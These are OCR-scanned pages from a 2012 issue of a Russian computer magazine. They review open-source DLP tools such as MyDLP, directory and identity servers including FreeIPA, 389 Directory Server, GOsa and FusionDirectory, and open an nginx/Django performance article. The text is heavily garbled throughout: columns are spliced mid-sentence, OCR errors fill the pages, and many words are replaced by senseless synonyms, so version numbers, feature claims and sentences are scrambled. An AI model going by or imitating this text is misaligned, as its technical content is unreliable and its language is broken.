~"'"-""""•......_,.,., • • - " • ,.,...,м

......-t..J.• r ..............

;:~':;:;;:::;~;,:~

-.мw

.......

~--......" .

~<М•otмr...w.u-N

[

Окно настроек

. ,.." _ ,.

0

MyDLP

Просмотр снимков экрана на

Модуль Netwoгklock использует методы

Falcongaze SecureTower инт е Евфрозина вместе с веб-nрокси [Squidl в целях фильтрации входящего равно ис­

DPI [Deep Packet

lпspectioп, фундаментальный обсуждение танцевальный шаг кетов! равно умеет посвящать прото­

х од автор щего веб-трафика , употребление на качестве контентнога

колы без зависимости ото порта, поэтом у сис вопрос позволяет подумаешь

ф ильтра в целях

соз выбрасывать политики в целях любого вида траф ика: веб-трафика,

помогите т а вление списков

Postfix, MS Exchange, слитие не без; Zimbгa; ACL нате ос нове IР -адресов да шаблонов.

трафика соцсетей, файлового, почтов ого равным образом !М-трафика. Распозна­ ются от инхронизации из мобильными устройствами : ActiveSyпc,

Palm

MS

HotS yпc равно iTuпes. В сегодняшнее момент на офици ­

альных не без; 3 сках н ет поддержки Р2Р равным образом

MyDLP умеет

обнар у живать равно отверзать зашиф­

Функ ционально система, n остроенная держи

Skype.

Возможно пустить в ход внеочередной устройство полно­

текстового п оиска

К кашаса е того ,

р ов анные файлы другими словами файлы, закрытые паролем [если поглощать ключ!.

Devicelock Seaгch Sегvег [DLSSI, некоторый

MyDLP,

состоит с четы­

рех ко мпонентов:

MyDLP Netwoгk -сетевой сервер ,

которой исnользуе т ся пользу кого

находит информацию во теневы х ко пия х равным образом журналах. Управление

nерехвата ТСР-соединений да является опорный для того

производится подле помощи гр у пповы х политический деятель домена, поэто­

Написан получай E гlang да

му клиенты механически п одх ватывают установки. Правил а

вместе с равно стеме, поддерживающей интерпретаторы.

создаются после вычитчик

На со л учай отсутствия

De vice lock

De vicelock GгoupPo l icy Мапаgег. Active Diгectoг y предусмотрена выступ

Епtегргisе Manageг, вместе с nо собная nолучать эмпирика

с любых LDАР-каталогов, на рента

Console

Python,

MyDLP.

можетбытьустановлен для какой приглянется

MyDLP Endp oint - aгeнт, водружаемый возьми конечных системах WinXP -S e7en l, nозволяет кон­

[поддерживаются 02/64 - битные

тролирова т ь весь критические операции : коnирование файлов,

De vicelock Management

отображается тек у ще е sos тояни е агентов. Такж е кли­

nечать, вторжение экрана, принятие nрав администратора равно т .

MyDLP Secuгity Monitoг- монитор,

n.

отслеживающий, кто такой равным образом какие

е нты могут рот навливаться не без; сделано nрек онфигурирова нны ми

сведения использует.

nараметрам и.

MyDLPWeb Ul-инструментуnравления настройками Netwoгk и Endpoint, которые эпизодически nодключаются для Web Ul, nо­

MYDLP COMMUNITY EDITION

л у чают последниеустановки равным образом сбрасывают лог. Написан возьми РНР и

Сайт проекта :

mydlp.orq. Лицензия: GNU GPL. ОС сервер: Ubuntu 00.04 LTS. ОС клиенты: Windows ХР, Vista, 0 (x86/x64l.

далеко не вызывает. Девиз

Бесnл~тная DLР-си не без; содержание [разработчики расшифровывают

MyDLP.

Data Loss Pгe vent ionl со отк рытым исходным

ко дом, включающая шпалеры функций про пр едотвращения прибыль

жайших nланах- POP/ IMAP, MSNMS/Jabbeг равно MS Exchangel; анализ документов - txt, MS Woгd/Excei/Poweгpoint 07-2k3, RTF,

ODF, PDF, PostScгipt , XM L, HTML, TAR, GZIP, RAR да др . ;

равным образом архивов-ZIР,

0z,

аж небольшое видео руководство. П осле ради n уска клиента во трее

Python-Magic , будто

Ubuntul, символ VMwaгe да реnозиторий Ubuntu 00.04 LTS [downloads. med гatech.com/ubu ntul. За nлату предлагается Еntегргisе-версия, имеющая расширен­ ные фонды анализа, подлакированный интерфейс, каран т ин, функцию

ар х ивирования да обеспечиваемая n оддержкой.

регистрация, блокировка [в nлатной версии Enteгpгi se добавле­ ны а р хи вирование равно карантин!; файлов

в области МD5-хешу;

018

О реп nолностью в рассуждении т ражает душа

невозможно. Проект предлагает монтировочный 050-образ [на базе

исследование nротоколов- НТТР/ НТТРS , FTP/ FТPS , SMTP, ICAP [в бли­

подсчёт М 0М Е-типа согласно данным

Easy, Simple,

Документация проекта содержит десяток мануалов, сделал т ь

nоявляется значок, сnрятать некоторый со п омощью штатных средств

данны х:

LibгeOffi ce

настроек да журнала собы т ий исnоль­

Процесс настройки равным образом подключения клиентов трудностей

Русификация: бог миловал (возможна собственными силами!. эту аббревиатуру на правах

Adobe Flex, пользу кого хранения MySQL.

зу ется

ЗАКЛЮЧЕНИЕ Нужно помнить, аюшки?

DLP- сие

nрежде общем инструмент, позво­

ляющий неизмеримо убавить риски, наличествование ко т орого сейчас само

выдержка тек не без; та изо файловбинарных форматов;

согласно себя дисциnлинирует сотрудников. Ожидать, который интрузия

установление исходного стих [C /Cн/C#/Java/A DA равным образом др.l; идентификация банковских счетов/кредитных карт, некоторых

таковой системы гарантированно защитит ото утечек , возникающи х

национальны х идентификационных боец ов;

захочет подать тож вышвырнуть ценную информацию, спирт несомненно

на результате умышленных действий, равным образом отнюдь не стоит. Если инсайдер

утилизация пользовательски х правил равным образом регулярных выражений,

найдет род интересах этого, почему годится как и ис n ользовать целое

статистический разложение равно байесовские классификаторы;

традиционные методы защиты . ::х::

ХАКЕР 03 / 058/ 001 0


ПРОДУКТЬI СО ВСЕГО МИРА*

OT&OPHbiE .........,. ......,...

Мы знаем , идеже на мире откопать самые лучшие из лучших пищевые продукты . Вы знаете, аюшки? можете обнаружить их рsщом , лещадь маркой TASH


SYN/ACK

Сергуся gгindeг Яремчук [g г indeг!Osynack.гul

В FгeeiPA предварительно вер~:: 2.1.3 включи;ел

переводу нет СSR(СVЕ-

~~11-36361. Для ее т

звимость

__ устранени аз многогрешный следуе обновиться предварительно

,

0 04

'' '' '' ''

\ \

'

-

что касается FгeeiPA

мы

исnользуется А~

аутентификаци

равно авторизац~~t для в решении относительно

виртуализации,

nостроенн~~М . на основе

Инсталляцию

описываемых nродуктов рекомендуется производить на се ч истую »

систему,

ю

далеко не выполняющу никаких других

функций .

Для

зации

cинxpsoн~ctive Diгec-

с имо tогу нeoбxo~indows 389D

назначить

Sync. После установки

оnакета 089-dsдля 389DS конфигура~;ситить

необходимо из-за

setupadmin.pl. скриnт

ница Red Hat Стра IРА- ге dhat __ .com/

I!J:.Q.IIl.QLiм.

• Утилита sys.t~m­ config-autentofo;я

cation, Сайт nрое_кта Fгeei­

PA- ~.

ds-

входящ

Fedora,

во сосрт~вит вкладку, соде ю nозволяющу

Страница Mandгi~

Diгectoгy S~г:":гq.

mds mandr1y_._

020

активировать ию тентификац

:~рез FгeeiPA.

ХАКЕР

03/158/2012


Корпоративные отношения

GOSll • ~oJIII flleJ;dot~НIIt OIYAookmПJ

+

· С

А

~Istltlp

{lp61111

.III'I.Q

0,11!115111\М

/:IS.Yptol ll

00..

\1MCl'l)yl4etlt ЬI

мо~Ш;~ f(r~fox

!;П~IQ

• )

~ccp·U121 .o.o. ~'"'

• o l "'· ~:.~с:. ----,_, 0.

-~~1 Gon14110

*'·'

<* мandriva

е А WlleOiмtoGOP

!!1!1.1

---

Adm!nlslrм!on

_

Ноше

User.groupand computer

SAMBAseNice

Nelwork

Mallservice

: !!iЪ••••_. : :11!11.

: м=-

: ~

f&.

.

managemenl

managemenl

EFI!

~~~

....

~ ~ ::...t~~OЦII _klop _ _ ",...

ca.ror ~«es• 00 GOu

:а=:...-::

......

-·-

Co<>t>t.~!I-I)'Pol"d ~UIO .... f<,ed

.

,,_ Pr...,_" v

..,."

.--

Ц~К~М~''""11-

_,....,pl..."

Mandriva Management Console nроста равно

089

~-..-

М..,.IIЦ'IQ~di-U!

DIRECТORY

nонятна во работе

SERVER

Разработчики отмечают высок у ю режим равным образом мас­ штабируемость

directory.fedoraproject.orq . Лицензия: GNU GPL. ОС: Fedora/Red Hat/CentOS, хорош потеть над чем во Linux (Deblan, Ubuntu, Gentoo), Solaris, HP/UX 01, lrix, AIX, Windows равным образом OSF/1 . обществом близ спонсорской поддержке

0996

возраст

Red Hat. Базой для Netscape Оiгес tогу

одной мережа может мучиться впредь до четырех

конфликтов, балансировкой н агрузки равным образом резервированием сервера . Поддерживаются работающие во режиме геаd-опlу сервера, некий аналог

него

Read

Опlу Oomaiп Сопtгоllег во

Active

Оiгесtогу

Win2k8 .

В нынешнее пора чертеж публично предлагает репази­

тарий да пакеты в целях RHEL/Fedoгa [подходят равным образом интересах Ceпt05l. Кроме того, возможна узел на других Liпux [ О еЬiап, Ubuntu, Gentool, 5olaгis, HP/UX 01. Некоторые версии поддерживаюттакже Windows, lгix , AIX равно 05 F/ 0. Однако создавание равно последующая опора

0егvег.

Он получил новое имя- F edoгa Оiгесtогу 0егvег- со временем того,

Red Hat. В 0009 году 389 Оiгесtогу 0егvег [389 соответственно номеру порта службы LOAPI. Причина проста: F05 неразрывно 2005

08905 . В

равноправных мастер-серверов не без; автоматическим разрешением

Сервер каталогов уровня предприятия, создаваемый со­

что компетенция возьми него на

:!OQ2-20U~I~-GOiLG0нZ.7l

GOsa nозволяет уnравлять учетными заnисями *nix равно сервисами

Сайт проекта:

послужил разрабатываемый вместе с

е

году приобрела

редакция вновь изменил номинация получи

на << неофициальных>> системах требует через админа еще некоторой

ассоциировался из Fedoгa, что, в соответствии с мнению разработчиков, тормо­

подготовки.

зило развитие, во частности интеграцию во отдельные люди дистрибутивы.

Компоненты

На основе

08905 Red Hat выпустила коммерческую версию Red Ha t Оiгесtогу 0егvег [R H0 01 со техподдержкой 04/7. Возможности 089 05 включают полную поддержку пр отокола LDAPv3, 05 L/ТL5 - равно 0А5 L­

08905

выпускаются согласно лицензии

GNU GPL,

так сер­

вер базируется получи ряде продуктов от другими лицензиями IMPL/ LGPL/GPL/XI. Стоиттакже отметить, сколько 089 05 является помогите т авной частью F гee iPA- централизованного решения про управления

аутентификацию, синхронизацию данных [пользователь, группа,

информацией касательно nользователях да политиках да к аудита. Речь об

батман роль) не без;

этом продукте пойдет немножечко ниже.

Active Оiгесtогу [при условии, что такое? получай КД Win2k3/2k8 установлен звено Windows 0yncl, размежевывание доступа впло ть давно отдель н ых а три бутов [и мя, гр уппа, IP да т. д .l В качестве криптадвижка используется комната N55 с Mozilla Pгoject. Конструктивно 08905 состоит изо сервера каталогов [Саге Оiгесtогу 5егvег, СО51 да сервера администрирования [Admin 0егvегl. Задача последнего- правление всеми доступными С О5 , чтобы что такое? пред­

MANDRIVA DIRECTORY SERVER Сайт проекта:

mds.mandriva.orq . GNU GPL. Дистрибутивы: Mandriva, Deblan/Ubuntu, CentOS/RHEL/Fedora, openSUSE, лик VMware. Лицензия:

Сервер Maпdгiva Оiгесtогу 0егvег [М О5 0 - простое на использо ­

лагается графическая модильон [389-coпsolel равным образом утилиты командной строки. В

Linux модильон устанавливается механически [написана на Javal. Для управления из-под Win2k3/2k8 в сайте проекта сле­ дует скача ть пакетик Windows Console.

вании решение, nозволяющее близ помощи наглядного интерфейса уnравлять учетными записями пользователей равным образом груnп, доступом

равным образом сетевыми сервисам да . П насчёт сути, сие пенис обная рубка по-над

FUSIONDIRECTORY Поскольку вход ко исходному коду

GOsa

приговор пользу кого управления, имеющее больше

Четко определен прейскурант поддерживаемых

удобные инструменты для того разработки,

дистрибутивов (DeЬian, CeпtOS

хотя да улучшить документацию .

0/RHEL 0, Fedoгa 14/15, openSUSE 01.3/11 .4, SLES 011, и, главное,

приняли вотум в рассуждении создании побольше

В октябре 0011-го вышла видоизменение FusionDiгec­

в целях каждого изо них создан репозиторий ,

открытого равно до конца поддерживаемого

toгy

сообществом фор ка ради привлечения

началась абсолютно недавно, в отношении каких -то особых

сторонних специалистов, а да обеспечения

функциональных отличиях с

интересах тех, кто именно далеко не имеет связи ко компании

Gonicus GmbH,

был затруднен, разработчики

0.0.2, но,

круглым счетом наравне служба по-над nроектом

GOsa

доколь

обеспечивающий простую установку. Еще одно медаль заключается в торжественно поддерживаемых веб­

условий к написания плагинов подина большее

бредить безвыгодный nриходится. Документация , объединение сути,

серверах. Разработчики nредлагают готовые

численность приложений. Новый расчёт

состоит с туман руководств, но, учитывая

конфигурационные файлы к

получил заглавие FusioпDiгectoгy ( fusiondiгec­

кровные узы от

равным образом

GOsa,

получи стадии ознакомления

Lighttpd,

Apache2

возможна тоже регулирование

toгy. org l . Разработчики обещали далеко не исключительно

не без; FusionDiгectoгy дозволено пустить в дело

получи и распишись пgiпх , так настройки придется учреждать

учредить самое <<м ощное равным образом универсальное >>

документацию получи и распишись отцовский проект.

самостоятельно.

ХАКЕР

03/158/2012

021


SYN/ACK

f1\e Edit V\tw SNrth

~nll

~

Не1р

~~ -

х ~~-

х

~ed:n:-

(root@fedora - )# ipa user - show vpupkin - -att

Console

dn: uid=vpupkin, cn=users, cn=accounts, dc::locat Useг

togin : vpupkin

first name: Vasja

Last na111e : Pupkin Full na11e: Vasja Pupkin Disptay name: vasja Pupkin Initiats: VP Home directory: /home/vpupkin GECOS fietd: vpupkin Login shel t :· / Ьin / sh Keгberos princi pa t: vpupkin@LOCAL UID : 0989288883 GIO : 0989288883

Account disabled : Fatse Hember of groups: ipausers ipauniqueid : 0dc4c446 - 02eЗ - lleB - a2d4 - B88c29f9bc76 krbext radata : AAgBAA=, AAL8vaBNcat9vdC9hZGlpbkBНТ8NBTAAж

- - г. ~ .-----

krЫastpwdchange:

08118469281326Z krbpa s swordexpiration : 08118489281326Z krbpwdpo\icyreference: cn::global_ policy, cn::LOCAL , cn : keгberos , dc::::locat mepmanagedent ry : cn:avpupkin, cn:::groups , cn=account s , dc=t ocat objectcta ss: top , pers on , organizationatperson, inetorgperson , inetuser, posixaccount , krbpr i nc i pa taux , krbt ic ketpoticyaux , ipaobj ect, ( root@fedora -

TroQ~......w;,;- -

~~e~O riginEntry

Для настройки

FreeiPA позволяется

LDAP- OpenLDAP,

Консоль управления

эксплуатнуть кронштейн

хоть бы возможна равно совместная действие не без;

08905.

Active

089 Directory Server

Diгectoгy равным образом позволяющей централизованно регулировать аутен­

Функционально может выстуnать на качестве РОС !уровня Windows NT41, LDAP-cepвepa не без; синхронизацией учетных заnисей равным образом nар а ­

тификацией пользователей, устанавли во ать политики дост упа равным образом ау­

лей, nолностью подменять

проектов, таких по образу дистрибутив F edoгa,

D iгectoгy либо интегрироваться

дита. Фактически FгeeiPA- сие комменсализм неск ольких опенсорсных

КегЬегоs равным образом может взяться исnользован в целях организации однократ утнапиштим

08905, MIT КегЬегоs, NTP BIND. На этом проекте, развиваемом около финансовой подд ержке Red Hat, основан используемый на коммерческом дистриб утиве продукт IPA, какой Red Hat накануне ста самодива общественности летом 2008 года. Впервые адрес FгeeiPA п оявился во составе Fedoгa 0 lмай 0008гоl, впрочем нормальная хронирование из Active Diгectoгy бери оный

аутентификации 05501. Разграничени е поперед сту nа про объектов уста­

мгновение до этих пор малограмотный была реализована. На первых порах клиенты

навливается вnлоть вплоть до отдельных атрибутов: пользователь, гр уnпа,

могли пристраиваться вручную, а сие было неудобно. В октябре

IР-адрес, промежуток времени да т. д.

0009-го началась эксплуатация по-над нов ой веткой

Active

на нее. Клиентскими ОС могут прислуживать

05 Х. Интерфейс nозволяет nр оизводить настройку аккаунтов да ACL в 0amba, ворочать совмес тным достуnом, nечатью возьми базе CUP5, доставкой nочты IPostfixl, настроить 0quid равно службы DN5/ DHCP, а дми нистрировать уче тные заnиси GLPI. Па кет включает Windows, Linux

равно Мае

Особенно nриятно, что-то проблемы, преследовавшие компанию Mandгiva, отнюдь не затронули

MD5

равно nродукт nостоянно развивается.

равным образом

0.0. Ее

финальная

модифицирование была до ста вл ена на конце марта 0011-го. День , во который был анонсирован релиз, запомнился многим пользователям

В последних версиях для указанным возможностям добавилось

в качестве кого << F edoгa

у ведение учетными записями системы Zaгafa, обеспечивающей

FгeeiPA2. В сегодняшний день миг реализованы:

05 Test Da y»,

Linux

причастный особенно тестированию

совместную работу, централизованное оберегание nубличных клю­

централизованное ведение учетными записями п ользо ват е­

из какого рода

лей, групп, компьютеро во да сер ви сов;

Open5SH , аудит,

политики паролей равно многое другое. Модульная

застывшая музыка nозволяет прибавлять нужную функциональность иначе говоря

заведование дост упом ко приложениям, устано вка политзаключенный жете ро­

выключать с интерфейса лишнее.

лей да настроек КегЬегоs, управле ние правилами

MD5 несомненно

масштабируется, под­

держивая серия тысяч заnисей получай по части дин сер на ер. Неn осредстве нно чтобы уп равления сервисами предназначен

Host Based Access Соntгоl-управление равно запасание ролей в LDAP; служба у правления сер тификатами IDogtag Ceгtificate 0егvегl.

устройство ММС

обмена

agent, отписанный для Pytho n да равным образом от nоль зую щий для да нными XM L-RPC. Агенты настраиваются быть помощи

ахти nростого во исnользовании веб-интерфейса ММС IMandгiva Management Consolel. Администратор может отобрать одиночный изо двух режимов отображения: Noгmal либо Ехрегt. В знак с

08905,

0UDO;

распознавание КегЬегоsдля пользователей да узлов;

Сеть, построенная не без; применением FгeeiPA , функционально мо­ жет быть с трех типов систем : одного другими словами нескольких серве ­

пакеты nредлагаются никак не всего лишь в целях «род­

ного » дистрибутива: имеется в наличии личный репозиторий

Debian,

ров, клиентских машин равно компьютера администратора. По следний, по сути, представляет собою заурядный посетительский -де сктоп не без; кон­

сборки пользу кого Cent05/RHEL/Fedoгa да open5U5E, а опять же отделанный

сольными утилитами для того удален ного уп равления FгeeiPA !кстати,

представление VMwaгe. Таким образом, серверную пай

воспользоваться их нимало неграмотный неотменно - полностью не возбраняется быть

MD5

дозволительно отно ­

сительно души равным образом минуя nроблем назначить во какой приглянется *niх-системе.

веб-интерфейсом, который-нибудь написан возьми

Продукт включен на партия изделий nоставки Mandгiva Ent eгpгise 0егvег.

MD5

nредставляет на лицо самое простое во установке равно конфигури­

Ja val.

Чтобы убавить нагр узку получай канал, заказчик использует локаль­

ный кеш ILDB равным образом XM LI, получая с него настройки на томик числе да быть

ровании решение, освещенное во нашем обзоре, тем не менее самос тоя­

отсутствии доступа для серверу. На клиентской системе устанавли­

тельная соединение нате других системах, сверх того МЕ5, ведь требует

сильно подробна да nозволяет разобраться кайфовый всех его нюансах.

вается комиссионер управления аутентификацией 0550 l5ystem 0ecuгity 5eгvices Daemonl . Клиентская порцион реализована никак не всего только для Red H at/Fedo гa равно клонов, хотя равным образом на др у ги х ОС да платформ: AIX,

iid!I!IIЩ

движение ке т ов чтобы

Сайт проекта:

их

некоторых навы засада в соответствии с работе со

LDAP.

Док уме нтация проекта

freeipa .orq . GNU GPL. Дистрибутивы: сервер- Fedora/CentOS, клиент- Linux, AIX, HPUX, Solaris, openSUSE. Цель проекта Fг eei PA IFгee ldentity, Policy and Auditl- созда­ Лицензия :

ние с целью L iпuх-систем среды, представляющей на лицо альтернативу

022

open5U5E. Что интересно, надо сборкой клиентских Ubuntu/Debian ll aunchpad.net/fгee i pa l равным образом обесnечением совместимости работают двум сотрудника Red Hat.

HP-UX,

0olaгis,

Сnециальное nриложение lceгtmongeгl у nрощает создание сер тифи катов да уnравление ими, машинально генерир уя равно nо­ лучая свежий письменное удостоверение объединение истечении срока поступки известно г о. Опционально возможна слитие от DN5-сервером бери базе

!нужен nлагин

BIND LDAP BIND вместе с динамическим обновлением помощью

ХАКЕР

03/158/2012


Корпоративные рука

Alltlwntkatlon Conflguratlon l l ldont;ty & Authontkot;on Us~r

lдdv•ncod Opt;on•J

АРАСНЕ

Account Conflguratlon

0 LDAP Free iPA 1

Softwaгe

Confl gur.~tion

( diгectoгy .

nоддерживает LDAPvЗ, КегЬегоs равным образом

.

·d

J

~~

Linu x, Windows

да Мае

05

Х , исходные

ADS получай любой Java . возможностей LDAP,

тексты nозволяют сконцентрировать

Java, Change

системе , про которой имеется Кроме стандартных

Passwoгd Pгotocol . Позиционируется в духе

реализованы хранимые процедуры , триггеры,

встраиваемое во кое-кто Jаvа-nриложения

динамические объекты

решение, все десятая спица отнюдь не заnрещает

другое. Распространяется почти лицензией

воспользоваться его автономно . Обеспечивает

Apache . В рамках nроекта разрабатывается Apache Diгectoгy Studio, включающий

совершение

~

Foundation

apache . oгg ). Полностью наnисан в

Winblnd

Authentic111tion Method:

во

Сервер каталогов, разрабатываемый

Apache

NIS

Authentication

DIRECTORY SERVER

Loc111L accounts onty

User Account Dat111base:

LDAP

равно КегЬегоs , возможна

Java

равным образом многое

осуществление поддержки любого протокола .

LDАР - браузер, браузер не без; х ем, редакторы

Продукт мультиnлатформенный . На сайте

LDIF

проекта достуnны nакеты в целях установки

администрирования.

равным образом

DSML,

клиентские программы на

Менеджер аутентификации во Fedora позволяет наметить FreeiPA

GSS-TSIG ]. При у правл ении комnьютерами равно группами компьюте­ ров права подтверждаются подле п омо щ да Ке гЬ е г оs keytab иначе

ет уп равлять запись ны ми из-за п ис ями

сертификата.

телей равным образом групп, компьютерами, списками рассылок, приложениями,

Модульная архитек т у ра серверной да клиентской части по­

базисная точка уп равления всей ИТ-инфрастр у ктурой . Интерфейс позволя ­

*nix

равно

настройками основных се тевы х служб :

Samba , правами

DHCP, DNS, НТТР, SMT P Gonicus GmbH ,

зволяет не принимая во внимание особых проблем интегриро на ать FгeeiPA равно первый встречный

равно т. д . Волга зработка вед ется лещадь эгидой компании

продукт. В сегодняшнее промежуток времени политики ис п ользуются во книга числе

ко от раиса использует

GOsa

п ользова­

во своих сервисах.

равно настройкам рабочего стола. По ка реализо ваны н е всё-таки функции

Все функции вын есе ны во плагины [принциn «о дин сервис= о дин плагин »], позтом у админ собирает конфигурацию во соо твет­

упра вления политиками , аудита да контроля, которые пл анируется

ствии со своими н уже дами.

равным образом на хра нения два мет ямища д ос т у танцевальный шаг ко локальным прилож ениям

В нынешнее сезон реализо ван касательно больше

вобрать во проект.

Н е т н астроек правил

SELinu x,

лещадь держки

централизованно г насчёт управления ключами

Samba, Fгe eRA DIUS , SSH равным образом LVM, ОТРи многого

другого. Очевидный огрех проду для та- нацеленность во пер­ вую что касается ч ередь получай производные касательно т

Red Hat дистриб ути вас .

Устано скручивать

сервер н ую ч асть Fг ee iPA позволено изо репозиториев F e d oгa,

K12LTSP

CentOS,

равно совмес тимы х вместе с ними . Р азработчики сдела ли всё , воеже

упрости ть судебное дело локализации на версии 0.0 [ис польз грин тся gettext и UTF8]. В каталоге ins tall / po нет переводу обложка гu.ро, во ко т ором nере ­ веде получи только лишь малая пакет сообщений. Пр оект динамично развивается, равно близ этом обнаруживаю т ся в рассуждении шиб­

0.1 .4 устраняет СSRF- уяз вимость [подделка запросов, CVE- 0011-3636].

00

плагинов, обеспе­

чиваю щ их ведение такими сервисам и, в духе

Squ id, Dan sGuaгdi n , Postfix, Couгieг- IM AP, Maildгop , GNARWL, C y гus-SASL , OpenSSL, ISC DHCP, WebDAV, Pu гe FTPd , РРТР, КегЬегоs, Asteгisk, Nag ios, OPSI, Netatalk, FAI, гsyslog, равным образом серверами коллективной работы: SOGo, OpenGгoupwaгe, Kolab, Scalix. При этом постоянно вам ш еуказан ны е nлагины безвыгодный обяза тельн в отношении д олжны подвизаться возьми одном сервере, неко­ торые с них мож н касательно устано крутить возьми отдельные хост ы.

Уче т ные заnиси п ользова телей об ъединяют ся во гр уп пы , для ко т орых назначают ся разрешенные приложения . При создании

н овых аккаунтов применяются шаблоны [админ создает их сам]

ки . П оследний релиз

из прописанными п равами дост упа для объек т ам . Н абор разреш ен ий

межсайтовых

ACL состоит изо в виде , касательно пр е д е ляющего тень , объектов [поль ­ зова т е л ей/гру пп] равным образом разреше н ий. Разрешения опре д е ляют совершенно

ieiN4

во озмож ны е д ейс тв ия: соз д а ни е, удочка л ение, сдвиг , чтение,

Сайт проекта: oss.gonicus.de/labs/qosa.

Лицензия:

GOsa -

GNU GPL.

Дистрибутивы: пакеты- Deblan/Ubuntu, RedHat/CentOS/Fedora, openSUSE/SLES, с исходных текстов- какой угодно *nix. Пр оект

копия равным образом т. д.

G0sa2, являющийся

надстройкой д ля nопулярных

унарный во нашем обзоре цель из локализо­

ванным интерфейсом у правления. Правда , локализован возлюбленный в эту пору

никак не полностью, н в рассуждении исnользова ни е

gettext

соответственно зволяе т возле необ хо ди­

мости свершить сие самостоятельно.

Поддерживает ся пасть н овка во любом дистриб у тиве

опенсорсных приложений, предо ставляе т администратору е дины й

Lin ux.

Раз­

работчики рекомендуют DeЬian , по-под какой-никакой соз дан разобщенный

fjle fdit Yi!:w Hi1tory Aookmarts

IЬols

tlt'IP

репозиторий. Такж е поперед от т у пны пакеты про Red Ha t/CentOS/ F e d oгa и ope nSUSE/ SLES, но, во вкусе правил о, разработчики никак не спешат их соби битва , следственно вер эти маленько запаздывают. Можно исполь ­ зовать всякий веб - сер вер, по части дн ако предпочтительность что касается тдается

да

nginx.

Apache2

Д окумен тация д ос т у пна ведь ль ко нате английском да н е п о­

спевает ради развитием проекта, многие моменты отражены во н ей весьма повер х ностно.

ЗАКЛЮЧЕНИЕ Даже невоо руже нн ым глазом видн о, аюшки? особо многофункцио­ USERS

насчёт --

0

нальным инструментом является

GOsa2.

Это вердикт обесnечивает у княжение у ч етными из-за n исями да многочисленными се рвисам и, поддер живает усишко тан овку

на потому что льшин стве ди стрибути вов

Linu x,

име е т локализованный

интерфейс. Однако окончате льны й избрание зависит через конкрет н ой Девиз

ldentity Policy Audit xopowo поясняет сущность FreeiPA

ХАКЕР

03 / 058/ 0012

из-за дачи . :х:

023


SYN/ACK

Геня Зобнин lexecЬit.rul

СОЗДАЕМ ВЫСОКОПРОИЗВОДИТЕЛЬНЫЙ САЙТ С ИСПОЛЬЗОВАНИЕМ

NGINX И DJANGO

При обсуждении высокой производительности веб-приложений нате рассудок невальна приходят такие названия, во вкусе

nginx, memcached, еассеlегаtог, hiphop равным образом им подобные . Фактически сие банальный

комбинация с целью любого высоконагруженного сайта, написанного вместе с использованием РНР. Но аюшки? если бы мы хотим доставать до сей времени соки с сайта на 121,

Django? ХАКЕР

03/158/ 0012

.


И вместе с пытание нагрузкой

Администрирование

Ojango

доброnожеnо•ет~ 0obnln и]"'он"т~nероп./Вы"т"

Администрирование сайта

·-fu · ~fb

Груrw1Ы

· ~llllb

. · и..е.

РАСПРЕДЕЛЕННЫЙ КЕШ

.. n.

. "' и-..nь

. • И!f.\Ctilllb

СайrЬI

+ Шмф~ фа"n"" из n-OЩ~IO OpenSSL on)'ISII MKOUH/1 М: сео.с •мяео аоот рат•онnаМн . ПOIApaiЛIIIO, OIHfi KII MitТUITO

М: АВВУУ 08::п.лат не: сн ... аJt lнl ~- · ведь АО кон ца

T1ogedltems

n-1111 ..

до сей времени их адреса посредством точку со запятой:

М: improw!,..,..rch"""Jine~•nkrng:l'

·~'''

. • ~ rь

+ A;Iбoolr rь

. · ~оЬuеrмть

hey lll ldltv. oax«Ьot.ruowr'llllr

discovef.:iyourV<IЬti .. . М: мноrоуроан• ... нат11жн .,.

011ПИСИ

I'OТOJ'I rt M: ПOJtн or:t • IO

К1теrор.,...

Стандартная админка

Django умеет растасовывать кеш объединение нескольким memcachedcepвepaм на автоматическом режиме . Для сего будет обратить

CACHE_BACKEND ; 'memcached://172.19.26.24e:1 0211 ;172.19.26.242:11212; 172.19.26.244:11213/ '

Django

Итак, допустим, автор собираемся зап у стить недавний веб-проект и решили воздвигать его от использованием фреймварка Djaпgo . По­

$ sudo apt-get install nginx memcached python \ python-setuptools mysql-server

чему Ojaпgo? Потому, почто дьявол красив, производителен да невероятно Pythoп, с тем максимально освободить программ иста. Благодаря

Вместо MySQL можно, ясно же, учредить PostgгeSQL. Django, а вдобавок uWSGI равно pythoп-memcached наш брат поставим с репо­

архитектуре модель-вид-контроллер [MVC) да модульном у дизай­

зитария Pythoп .

дружелюбен ко разработчикам. Djaпgo использует всю мощь языка

ну, так питаться структуре, построенной изо обособленных кирпичиков, Оjапgо-приложения для изумление просты во конструировании и сопровождении. Система беретик возьми себя

00% работы,

$ sudo easy_install django uwsgi python-memcached

почему описа­

ние данных, изделие алгоритма их обработки равно отображения пре­ вращается на тривиальную задачу, на каждом слове решаемую во до некоторой степени

Также нам понадобится кеширующий фреймворк djohnпy-cache, о назначении которого автор этих строк расскажу позже:

десятков строк стих [например, в целях создания простейшего сайта с полноценной веб-админкой порядочно настукать лишь порядком

строк) . И всё сие кроме уродливого SQL, скрытого ото программи из та за классами Pythoп, возьми основе которых равным образом генерируется проект базы данных.

Мы ожидаем, который возможность склифосовский обладать высокую посещаемость,

$ sudo easy_install djohnny-cache

НАСТРОЙКА NGINX Первым делом настраиваем nginx . Всё до стандартной схеме. Бэка­ пим неоригинальный конфиг nginx:

потому нам нужно зараз рассчитать всегда возможные пути опти­

мизации . Перво-напер закачаешься автор должны поднять легкий, бойкий ,

$ sudo mv / etc / nginx/{nginx.conf,nginx.conf.old}

укромный во настройке равно сопровождении веб-сервер. Это, известно

же, пginx, некоторый несложно невыгодный имее т конкурентов в области скорости

Создаем новоиспеченный конфиг равно пишем во него следующее:

отдачи контента. Мы откажемся через стандартных конфигураций с в рассуждении всякими громоздкими апачами нате стороне бэк-энда да будем

пускать в дело пgiпх в духе базисный веб-сервер [впоследствии такую схему не возбраняется усилий расклешить не без; через дополнительных серве­

углубление да балансировщиков нагрузки). Второй шаг- приговор вопроса что до часть , в качестве кого будут связаны nginx и Djaпgo . Понятно, сколько выгодно отличается просто-напросто эксплуатнуть интерфейс

WSGI, сформированный предумышленно пользу кого Python, однако я должны выбрать правильную реализацию сего интерфейса . Казалось бы, здесь вариант один- mod_wsgi с комплекта пgiпх, тем не менее для положение

связующего звена значительнее идет бридж uWSGI [ pгojects.unblt . it/

uwsgi ), тот или другой показывает несравненно лучшую производительность при минимальных требованиях ко оперативной памяти [пруфлинк

